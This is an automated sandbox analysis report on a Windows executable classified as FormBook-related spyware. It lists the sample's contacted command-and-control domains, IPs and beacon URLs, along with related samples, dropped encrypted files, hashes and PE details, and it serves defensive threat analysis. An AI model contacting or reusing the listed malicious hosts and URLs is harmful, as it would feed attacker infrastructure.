                http://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&TXVlY=nv6XU20pgPTDN00%Avira URL Cloudsafe
                http://www.thinkone.xyz/b0aw/0%Avira URL Cloudsafe
                http://www.linkdex.com/bots/)0%Avira URL Cloudsafe
                https://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo0%Avira URL Cloudsafe
                http://www.gern.dev/xbnt/?94=rqIPJyQOuOJXv4fam5ihbRMSLxb0TSwIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlVDgekBEOU7d1VgzmTDcFpkSUd31giEOekxs=&TXVlY=nv6XU20pgPTDN00%Avira URL Cloudsafe
                http://www.gern.dev/xbnt/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.aoivej.info
                		47.83.1.90
                		truetrue
                  		unknown
                  www.newbh.pro
                  		176.57.65.76
                  		truefalse
                    		high
                    mraber.dev
                    		46.38.243.234
                    		truetrue
                      		unknown
                      www.gern.dev
                      		185.151.30.223
                      		truetrue
                        		unknown
                        www.givvjn.info
                        		47.83.1.90
                        		truetrue
                          		unknown
                          www.thinkone.xyz
                          		209.74.79.41
                          		truetrue
                            		unknown
                            www.mraber.dev
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.newbh.pro/fpja/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&TXVlY=nv6XU20pgPTDN0true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.thinkone.xyz/b0aw/?TXVlY=nv6XU20pgPTDN0&94=VOu4tm+43rVZiGe5FbAiEYOvTb19T2jZsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLd6K3CAsSqZssuvcDLtxMQvu7+dmYX9caOt4=true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.thinkone.xyz/b0aw/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.givvjn.info/wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQUF+eqUdc9aZVsWrUptbZMNnY=&TXVlY=nv6XU20pgPTDN0true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.givvjn.info/wl3x/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.mraber.dev/ixqi/?94=TN9kbi/KmEXimVSL0ERanCo8EPrJiw0+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyN0TYvIjkiLeGXDgVU6Nef5fP7k6kFQJQYe0=&TXVlY=nv6XU20pgPTDN0true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.mraber.dev/ixqi/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.gern.dev/xbnt/?94=rqIPJyQOuOJXv4fam5ihbRMSLxb0TSwIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlVDgekBEOU7d1VgzmTDcFpkSUd31giEOekxs=&TXVlY=nv6XU20pgPTDN0true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.gern.dev/xbnt/true
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.mraber.devFKUPIibLrFYhJ.exe, 00000007.00000002.3561922988.00000000050D4000.00000040.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ac.ecosia.org/autocomplete?q=relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/chrome_newtabrelog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icorelog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrelog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.linkdex.com/bots/)firefox.exe, 00000008.00000002.2345513606.0000021D37B2D000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.ecosia.org/newtab/relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyoFKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                176.57.65.76
                                                		www.newbh.proBosnia and Herzegowina
                                                		47959TELINEABAfalse
                                                47.83.1.90
                                                		www.aoivej.infoUnited States
                                                		3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                                                209.74.79.41
                                                		www.thinkone.xyzUnited States
                                                		31744MULTIBAND-NEWHOPEUStrue
                                                185.151.30.223
                                                		www.gern.devUnited Kingdom
                                                		48254TWENTYIGBtrue
                                                46.38.243.234
                                                		mraber.devGermany
                                                		197540NETCUP-ASnetcupGmbHDEtrue

                                                General Information

                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1588891
                                                Start date and time:2025-01-11 06:53:45 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 41s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Run name:Run with higher sleep bypass
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:BDlwy8b7Km.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:9e39a50469e60d2c9d851e9cd2b35c298a5990f1ab1ab57faba228ed32a814f3.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@6/5
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 95%
                                                • Number of executed functions: 43
                                                • Number of non-executed functions: 286
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target FKUPIibLrFYhJ.exe, PID 4484 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • VT rate limit hit for: BDlwy8b7Km.exe

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                176.57.65.764p5XLVXJnq.exeGet hashmaliciousFormBookBrowse
                                                • www.newbh.pro/67jc/
                                                SLq0ulC3Wf.exeGet hashmaliciousFormBookBrowse
                                                • www.newbh.pro/67jc/
                                                k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                • www.newbh.pro/fpja/?cNPH=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&EtJTX=_JVX4ryxDRQpLJF
                                                XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                • www.newbh.pro/fpja/?9F=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&wtE0B=1LjxZz
                                                J1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                • www.newbh.pro/z9pt/
                                                47.83.1.90k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                • www.dkeqqi.info/1dyw/?cNPH=r4IIUaGg8Ysw6Z88K77s9M2UXGNuluWHvSk1OgU5mSYSbSsTUuuLMPChZLQsUTMX5ns6JDTUfCzdkiOd4VeD2v0HOFU0ImfoMqjgmv5MAgVZY7DuZfSFf9DemTdSFvne3C9WyBVTb1Eg&EtJTX=_JVX4ryxDRQpLJF
                                                XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                • www.givvjn.info/wl3x/?9F=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&wtE0B=1LjxZz
                                                FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                • www.cloijz.info/r4db/
                                                KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                • www.ripbgs.info/mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P
                                                smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                • www.cloijz.info/r4db/
                                                1162-201.exeGet hashmaliciousFormBookBrowse
                                                • www.ripbgs.info/hf4a/
                                                QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                • www.givvjn.info/nkmx/
                                                QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                • www.givvjn.info/nkmx/
                                                QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                • www.givvjn.info/nkmx/
                                                ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • www.cruycq.info/6jon/

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                www.aoivej.infok9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                www.gern.devk9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                • 185.151.30.223
                                                XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                • 185.151.30.223
                                                J1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                • 185.151.30.223
                                                www.givvjn.infok9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                www.thinkone.xyzk9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.41
                                                XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.41
                                                www.newbh.pro4p5XLVXJnq.exeGet hashmaliciousFormBookBrowse
                                                • 176.57.65.76
                                                SLq0ulC3Wf.exeGet hashmaliciousFormBookBrowse
                                                • 176.57.65.76
                                                k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                • 176.57.65.76
                                                XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                • 176.57.65.76
                                                J1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                • 176.57.65.76

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                VODANETInternationalIP-BackboneofVodafoneDEk9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                6.elfGet hashmaliciousUnknownBrowse
                                                • 82.82.131.16
                                                FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                1162-201.exeGet hashmaliciousFormBookBrowse
                                                • 47.83.1.90
                                                5.elfGet hashmaliciousUnknownBrowse
                                                • 88.79.50.180
                                                6.elfGet hashmaliciousUnknownBrowse
                                                • 178.10.231.77
                                                armv4l.elfGet hashmaliciousUnknownBrowse
                                                • 88.68.235.154
                                                TELINEABA4p5XLVXJnq.exeGet hashmaliciousFormBookBrowse
                                                • 176.57.65.76
                                                SLq0ulC3Wf.exeGet hashmaliciousFormBookBrowse
                                                • 176.57.65.76
                                                k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                • 176.57.65.76
                                                XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                • 176.57.65.76
                                                J1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                • 176.57.65.76
                                                belks.arm.elfGet hashmaliciousMiraiBrowse
                                                • 88.214.61.247
                                                belks.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 88.214.61.239
                                                na.elfGet hashmaliciousMiraiBrowse
                                                • 88.214.61.214
                                                ImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 176.57.64.102
                                                220204-TF1--00.exeGet hashmaliciousFormBookBrowse
                                                • 176.57.64.102
                                                MULTIBAND-NEWHOPEUSwSoShbuXnJ.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.42
                                                4p5XLVXJnq.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.40
                                                BLv4mI7zzY.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.40
                                                SLq0ulC3Wf.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.40
                                                ZcshRk2lgh.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.109
                                                ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.42
                                                BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.107
                                                02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 209.74.77.109
                                                suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.109
                                                k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.41

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\18155I0h

                                                Download File
                                                Process:C:\Windows\SysWOW64\relog.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                Category:dropped
                                                Size (bytes):114688
                                                Entropy (8bit):0.9746603542602881
                                                Encrypted:false
                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\autB67F.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\BDlwy8b7Km.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287232
                                                Entropy (8bit):7.994108818584018
                                                Encrypted:true
                                                SSDEEP:6144:3gPxbZfKcSe5yj3nkyTEVR9jsrufq7KYVm7HTfl/+mspnnEV:QDiCs3kyQfs+qMQY
                                                MD5:3D8D7C0F5764C92EE052E7489C96966F
                                                SHA1:23C9DFF41E3D869AF2F3B7D93F4D1833C7ABA892
                                                SHA-256:71D87CD6CB706CAFBC1DEF496DD7BE895578714A578A24876EEAF1301B25810E
                                                SHA-512:E9D3E9CA20E628D2195312F230A1166B068D170C6A0411EEE8859628AF484B5A6DF0CB5C51D733178AD6ACF5D1B1B0873598A3DD391DA5419A7C45DADBD7996D
                                                Malicious:false
                                                Reputation:low
                                                Preview:...YLVVQ<E1O..16.Y5KUEWK.5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN.6OY;T.KW.D.x.W....Y&=nAD >G*8e4*#[6;v44.7D!n'_...fk8*3.c8TErVQ8E1ON70?.dU,.x7,..9(.L..../).+...+2.M...e/1..Q&Yr.).6OY5KUEW..5Y.WWQ..`/NN16OY5K.EUJF4ROV.U8E1ONN16OY!KUEGKM59KVVQxE1_NN14OY3KUEWKM5_OVVQ8E1O.J16MY5KUEWIMu.OVFQ8U1ONN!6OI5KUEWK]5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY.?0=#KM5..RVQ(E1O.J16_Y5KUEWKM5YOVVQ.E1/NN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1

                                                C:\Users\user\AppData\Local\Temp\konked

                                                Download File
                                                Process:C:\Users\user\Desktop\BDlwy8b7Km.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287232
                                                Entropy (8bit):7.994108818584018
                                                Encrypted:true
                                                SSDEEP:6144:3gPxbZfKcSe5yj3nkyTEVR9jsrufq7KYVm7HTfl/+mspnnEV:QDiCs3kyQfs+qMQY
                                                MD5:3D8D7C0F5764C92EE052E7489C96966F
                                                SHA1:23C9DFF41E3D869AF2F3B7D93F4D1833C7ABA892
                                                SHA-256:71D87CD6CB706CAFBC1DEF496DD7BE895578714A578A24876EEAF1301B25810E
                                                SHA-512:E9D3E9CA20E628D2195312F230A1166B068D170C6A0411EEE8859628AF484B5A6DF0CB5C51D733178AD6ACF5D1B1B0873598A3DD391DA5419A7C45DADBD7996D
                                                Malicious:false
                                                Preview:...YLVVQ<E1O..16.Y5KUEWK.5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN.6OY;T.KW.D.x.W....Y&=nAD >G*8e4*#[6;v44.7D!n'_...fk8*3.c8TErVQ8E1ON70?.dU,.x7,..9(.L..../).+...+2.M...e/1..Q&Yr.).6OY5KUEW..5Y.WWQ..`/NN16OY5K.EUJF4ROV.U8E1ONN16OY!KUEGKM59KVVQxE1_NN14OY3KUEWKM5_OVVQ8E1O.J16MY5KUEWIMu.OVFQ8U1ONN!6OI5KUEWK]5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY.?0=#KM5..RVQ(E1O.J16_Y5KUEWKM5YOVVQ.E1/NN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.023010207224862
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:BDlwy8b7Km.exe
                                                File size:1'334'784 bytes
                                                MD5:95b9d05f97fba1718d8c85967ebffc4c
                                                SHA1:8752f152236cf941e59aff72b182c5afc205927e
                                                SHA256:9e39a50469e60d2c9d851e9cd2b35c298a5990f1ab1ab57faba228ed32a814f3
                                                SHA512:d42d816e7d7fa8885aee1a173a371d315cf3283eae92677675c4d6f06ca199c633136cb7389bea1184aaf384a358b938b2d7c3d7ce1d518e7bfe5515531215e0
                                                SSDEEP:24576:PqDEvCTbMWu7rQYlBQcBiT6rprG8aMbSKqC6+mq4wELb:PTvC/MTQYxsWR7aMbLqC6+t
                                                TLSH:EF55C0027381D062FF9B91730F5AF61146BD6E6A0127A51F23983D7ABE701B2163E763
                                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                File Icon

                                                Icon Hash:1c4c898989a581ab

                                                Static PE Info

                                                General

                                                Entrypoint:0x420577
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x67615F2B [Tue Dec 17 11:23:23 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:948cc502fe9226992dce9417f952fce3

                                                Entrypoint Preview

                                                Instruction
                                                call 00007F48184CDFB3h
                                                jmp 00007F48184CD8BFh
                                                push ebp
                                                mov ebp, esp
                                                push esi
                                                push dword ptr [ebp+08h]
                                                mov esi, ecx
                                                call 00007F48184CDA9Dh
                                                mov dword ptr [esi], 0049FDF0h
                                                mov eax, esi
                                                pop esi
                                                pop ebp
                                                retn 0004h
                                                and dword ptr [ecx+04h], 00000000h
                                                mov eax, ecx
                                                and dword ptr [ecx+08h], 00000000h
                                                mov dword ptr [ecx+04h], 0049FDF8h
                                                mov dword ptr [ecx], 0049FDF0h
                                                ret
                                                push ebp
                                                mov ebp, esp
                                                push esi
                                                push dword ptr [ebp+08h]
                                                mov esi, ecx
                                                call 00007F48184CDA6Ah
                                                mov dword ptr [esi], 0049FE0Ch
                                                mov eax, esi
                                                pop esi
                                                pop ebp
                                                retn 0004h
                                                and dword ptr [ecx+04h], 00000000h
                                                mov eax, ecx
                                                and dword ptr [ecx+08h], 00000000h
                                                mov dword ptr [ecx+04h], 0049FE14h
                                                mov dword ptr [ecx], 0049FE0Ch
                                                ret
                                                push ebp
                                                mov ebp, esp
                                                push esi
                                                mov esi, ecx
                                                lea eax, dword ptr [esi+04h]
                                                mov dword ptr [esi], 0049FDD0h
                                                and dword ptr [eax], 00000000h
                                                and dword ptr [eax+04h], 00000000h
                                                push eax
                                                mov eax, dword ptr [ebp+08h]
                                                add eax, 04h
                                                push eax
                                                call 00007F48184D065Dh
                                                pop ecx
                                                pop ecx
                                                mov eax, esi
                                                pop esi
                                                pop ebp
                                                retn 0004h
                                                lea eax, dword ptr [ecx+04h]
                                                mov dword ptr [ecx], 0049FDD0h
                                                push eax
                                                call 00007F48184D06A8h
                                                pop ecx
                                                ret
                                                push ebp
                                                mov ebp, esp
                                                push esi
                                                mov esi, ecx
                                                lea eax, dword ptr [esi+04h]
                                                mov dword ptr [esi], 0049FDD0h
                                                push eax
                                                call 00007F48184D0691h
                                                test byte ptr [ebp+08h], 00000001h
                                                pop ecx

                                                Rich Headers

                                                Programming Language:
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x6f3cc.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1440000x7594.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
